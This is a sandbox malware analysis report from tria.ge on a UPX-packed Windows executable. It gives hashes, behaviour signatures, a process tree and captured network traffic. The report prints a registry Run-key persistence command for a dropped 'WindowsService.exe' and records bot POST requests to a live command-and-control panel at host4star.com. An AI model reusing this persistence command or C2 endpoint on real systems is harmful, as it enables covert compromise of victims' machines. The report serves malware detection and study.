Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

7

1149ba2f4a...cs.exe

windows7-x64

7

1149ba2f4a...cs.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    25/05/2024, 19:30 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1149ba2f4ab7b17b8baee8f4c9a5cb50_NeikiAnalytics.exe

  • Size

    102KB

  • MD5

    1149ba2f4ab7b17b8baee8f4c9a5cb50

  • SHA1

    b1b34e010dfaf2b5eae2ab15c48de1766ffa70c7

  • SHA256

    eb3fed4907ab931d7b7e767c050619f57796c595e4708193b7ea6d192df36d03

  • SHA512

    5115b2762fdeda7e045030af11079c6cc94e17d3f5af17ac48180bedd687d7def87cfbdd3acbab16243564c807360cabfba8601aa1c9f16ebdb6db01847d54fd

  • SSDEEP

    3072:xFphTfm1UC7AdYzrV+Dljy/32ubwZZqJ:FhTfmuCkdYzrVolu/J0ZZ

Score
7/10
persistenceupx

Malware Config

Signatures

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 16 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1149ba2f4ab7b17b8baee8f4c9a5cb50_NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\1149ba2f4ab7b17b8baee8f4c9a5cb50_NeikiAnalytics.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2128
    • C:\Users\Admin\AppData\Local\Temp\1149ba2f4ab7b17b8baee8f4c9a5cb50_NeikiAnalytics.exe
      "C:\Users\Admin\AppData\Local\Temp\1149ba2f4ab7b17b8baee8f4c9a5cb50_NeikiAnalytics.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2588
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\BGVUI.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2488
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "sidebar" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe" /f
          4⤵
          • Adds Run key to start application
          PID:2516
      • C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe
        "C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2484
        • C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe
          "C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2656
        • C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe
          "C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe"
          4⤵
          • Executes dropped EXE
          PID:2056

Network

  • flag-us
    DNS
    ilovetehpussay.host4star.com
    WindowsService.exe
    Remote address:
    8.8.8.8:53
    Request
    ilovetehpussay.host4star.com
    IN A
    Response
    ilovetehpussay.host4star.com
    IN A
    72.52.178.23
  • flag-us
    POST
    http://ilovetehpussay.host4star.com/Panel/bot.php
    WindowsService.exe
    Remote address:
    72.52.178.23:80
    Request
    POST /Panel/bot.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: umbra
    Host: ilovetehpussay.host4star.com
    Content-Length: 63
    Cache-Control: no-cache
  • flag-us
    POST
    http://ilovetehpussay.host4star.com/Panel/bot.php
    WindowsService.exe
    Remote address:
    72.52.178.23:80
    Request
    POST /Panel/bot.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: umbra
    Host: ilovetehpussay.host4star.com
    Content-Length: 49
    Cache-Control: no-cache
  • flag-us
    POST
    http://ilovetehpussay.host4star.com/Panel/bot.php
    WindowsService.exe
    Remote address:
    72.52.178.23:80
    Request
    POST /Panel/bot.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: umbra
    Host: ilovetehpussay.host4star.com
    Content-Length: 63
    Cache-Control: no-cache
  • flag-us
    POST
    http://ilovetehpussay.host4star.com/Panel/bot.php
    WindowsService.exe
    Remote address:
    72.52.178.23:80
    Request
    POST /Panel/bot.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: umbra
    Host: ilovetehpussay.host4star.com
    Content-Length: 49
    Cache-Control: no-cache
  • 72.52.178.23:80
    http://ilovetehpussay.host4star.com/Panel/bot.php
    http
    WindowsService.exe
    474 B
     172 B
     5
    4

    HTTP Request

    POST http://ilovetehpussay.host4star.com/Panel/bot.php
  • 72.52.178.23:80
    http://ilovetehpussay.host4star.com/Panel/bot.php
    http
    WindowsService.exe
    460 B
     172 B
     5
    4

    HTTP Request

    POST http://ilovetehpussay.host4star.com/Panel/bot.php
  • 72.52.178.23:80
    http://ilovetehpussay.host4star.com/Panel/bot.php
    http
    WindowsService.exe
    474 B
     172 B
     5
    4

    HTTP Request

    POST http://ilovetehpussay.host4star.com/Panel/bot.php
  • 72.52.178.23:80
    http://ilovetehpussay.host4star.com/Panel/bot.php
    http
    WindowsService.exe
    460 B
     172 B
     5
    4

    HTTP Request

    POST http://ilovetehpussay.host4star.com/Panel/bot.php
  • 8.8.8.8:53
    ilovetehpussay.host4star.com
    dns
    WindowsService.exe
    74 B
     90 B
     1
    1

    DNS Request

    ilovetehpussay.host4star.com

    DNS Response

    72.52.178.23

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\BGVUI.bat
    Filesize

    157B

    MD5

    f6a90c20834f271a907a4e2bc28184c2

    SHA1

    36c9d1602b74f622346fbb22693597d7889df48d

    SHA256

    73f29cd953eee40cea4de67842556ffd96efe8094a6a9b70f33a35df2582febd

    SHA512

    39cabae19fe1faa37455e4bd242c868be60d6252b07f01224b3f7501c3cf734e503300b840d83381a452707cab6df2f95f920655884be56d4024676b26943804

    Download Submit

  • \Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe
    Filesize

    102KB

    MD5

    a122ac356ae49f2a385a6d233dfd6014

    SHA1

    0e006f642d2729f6edd1c325dd6fa0300e54eab1

    SHA256

    8ea8cb7b2c18891607b596e51fa18eba5370b3cf88f341fa14d92e077c55607d

    SHA512

    c1729e25670742f818cc9119551bc92d36f35e52a6be46715345863a81b4705e3f61727b6f55ea3a13cc0805c8a4835d650ba90f8c3466ea089afc4294c61978

    Download Submit

  • memory/2128-447-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/2128-446-0x0000000002AB0000-0x0000000002AEB000-memory.dmp

    Filesize

    236KB

    Download

  • memory/2128-161-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/2128-82-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/2128-79-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/2128-64-0x0000000000408000-0x0000000000409000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2128-452-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/2128-3-0x0000000000230000-0x0000000000231000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2128-0-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/2128-126-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/2128-31-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/2484-494-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/2484-1045-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/2588-448-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2588-493-0x0000000003360000-0x000000000339B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/2588-484-0x0000000003360000-0x000000000339B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/2588-1048-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2656-1041-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2656-1053-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.